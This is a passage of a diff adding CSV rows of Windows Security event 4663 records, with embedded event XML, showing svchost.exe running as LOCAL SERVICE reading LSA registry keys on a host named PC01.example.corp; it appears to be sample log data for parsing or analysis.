+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:14.634426+04:00,1553038514.634426,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.634426Z"">
+    </TimeCreated>
+    <EventRecordID>452813</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.365477Z"">
+    </TimeCreated>
+    <EventRecordID>452922</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.365477Z"">
+    </TimeCreated>
+    <EventRecordID>452921</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.365477Z"">
+    </TimeCreated>
+    <EventRecordID>452920</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.365477Z"">
+    </TimeCreated>
+    <EventRecordID>452919</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452918</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452917</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452916</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452915</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452914</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452913</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452912</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452911</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452910</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452909</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452908</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
